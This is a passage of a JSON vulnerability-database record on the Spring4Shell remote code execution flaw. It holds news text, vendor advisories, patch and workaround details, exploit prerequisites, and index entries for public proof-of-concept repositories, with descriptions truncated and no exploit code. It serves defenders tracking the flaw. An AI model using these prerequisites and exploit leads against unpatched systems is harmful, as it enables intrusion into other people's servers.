[said](<https://blog.checkpoint.com/2022/04/05/16-of-organizations-worldwide-impacted-by-spring4shell-zero-day-vulnerability-exploitation-attempts-since-outbreak/>), adding it detected 37,000 Spring4Shell-related attacks over the weekend.\n\nMicrosoft 365 Defender Threat Intelligence Team also [chimed in](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>), stating it has been \"tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities.\"\n\nAccording to [statistics](<https://www.sonatype.com/resources/springshell-exploit-resource-center>) released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.\n\nCisco, which is [actively investigating](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>) its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected -\n\n * Cisco Crosswork Optimization Engine\n * Cisco Crosswork Zero Touch Provisioning (ZTP), and\n * Cisco Edge Intelligence\n\nVMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable -\n\n * VMware Tanzu Application Service for VMs\n * VMware Tanzu Operations Manager, and\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n\"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>) in the advisory.\n\nAlso added by CISA to the catalog are [two zero-day flaws](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the [Beastmode](<https://thehackernews.com/2022/04/beastmode-ddos-botnet-exploiting-new.html>) Mirai-based DDoS campaign.\n\nPursuant to the Binding Operational Directive (BOD) [issued](<https://www.cisa.gov/binding-operational-directive-22-01>) by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:31:00", "type": "thn", "title": "CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45382", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-22965"], "modified": "2022-04-06T03:27:40", "id": "THN:9F9D436651F16F99B6EA52F0DB9AE75C", "href": "https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-04-08T19:29:06", "description": "A remote code execution vulnerability exists in Spring Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Core Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CPAI-2022-0104", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-04-15T14:31:58", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "github", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T16:26:09", "id": "GHSA-36P3-WJMG-H94X", "href": "https://github.com/advisories/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-13T15:23:10", "description": "# CVE-2022-22965\nSpring4Shell (CVE-2022-22965)\n\n## Usage\n\n### 1....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T12:37:32", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T04:23:45", "id": "1F4670D2-70D1-5F68-B5BB-2674FB754D26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:10", "description": "# irule-cve-2022-22965\n\nThis is a basic iRule to provide some mi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T02:17:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T20:12:07", "id": "A8866ED4-A944-571F-8135-6138A2E9B568", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:48:57", "description": "# CVE-2022-22965 PoC - Payara Arbitrary File Download\n\nMinimal e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T15:26:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T12:25:13", "id": "661FCFFE-E5C3-5CF9-9CD5-68869CEDED1E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:43", "description": "# CVE-2022-22965\n\n[Spring Framework/CVE-2022-22965](https://cve....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T06:50:21", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T12:12:05", "id": "D09EAEC3-7B66-5E76-BF91-64C048C7D58D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T04:37:08", "description": "# spring-core-rce \nspring core rce \u7b80\u5355\u5229\u7528 \n\nwar\u53ef\u4ee5\u4f7f\u7528 \nhttps://gi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:18", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T02:56:25", "id": "81DFF6A6-4518-543A-B06C-E7A6466ACB88", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:19", "description": "# Spring4shell RCE vulnerability\n\nThis vulnerability affects Spr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T20:16:06", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T21:09:58", "id": "89B78640-ACE2-5A00-845E-1CEFFFDD4A2E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:14", "description": " Nmap (NSE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T00:08:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T02:15:39", "id": "B158F1AE-13DF-5F49-88D5-73B5B6183926", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T19:59:33", "description": "# spring-rec-demo\n\nThe demo code showing the recent Spring4Shell...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T04:17:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-26T19:31:44", "id": "69C8078C-1B8D-5B51-8951-4342A675A93D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T03:13:13", "description": "# CVE-2022-22965 poc\nCVE-2022-22965 poc including reverse-shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T19:19:52", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-25T07:43:27", "id": "0018F9FA-176E-52D1-B790-5C67C302BC74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T01:21:03", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T23:33:13", "id": "EE4B4CDB-5690-556D-9581-E198CF03A9BE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T01:22:15", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T23:33:13", "id": "A0648F78-7165-5CA8-82DC-B34350E2DDC6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T01:22:44", "description": "# Safer_PoC_CVE-2022-22965\nA Safer PoC for CVE-2022-22965 (Sprin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T16:58:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T23:33:55", "id": "9538B7BA-979F-523C-9913-4FE62CF77C5C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-14T19:20:16", "description": "# Spring4shell_behinder\n\n## \u8fd9\u662f\u4ec0\u4e48?\n\n\u4e00\u4e2a\u9488\u5bf9spring4shell\u6f0f\u6d1e(CVE-2022-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T03:50:14", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-14T11:40:41", "id": "7883CC8E-9B35-5C0F-AE2E-271FAC17648B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:15:16", "description": "# Spring Framework RCE exploitation (Quick pentest notes)\n\n<p al...", "cvss3": {}, "published": "2022-03-31T15:43:06", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T13:15:56", "id": "EF55EC2D-994E-5971-8941-B595536F5992", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:27", "description": "# Spring4Shell(CVE-2022-22965)\n\nSpring Framework RCE via Data Bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T13:35:01", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 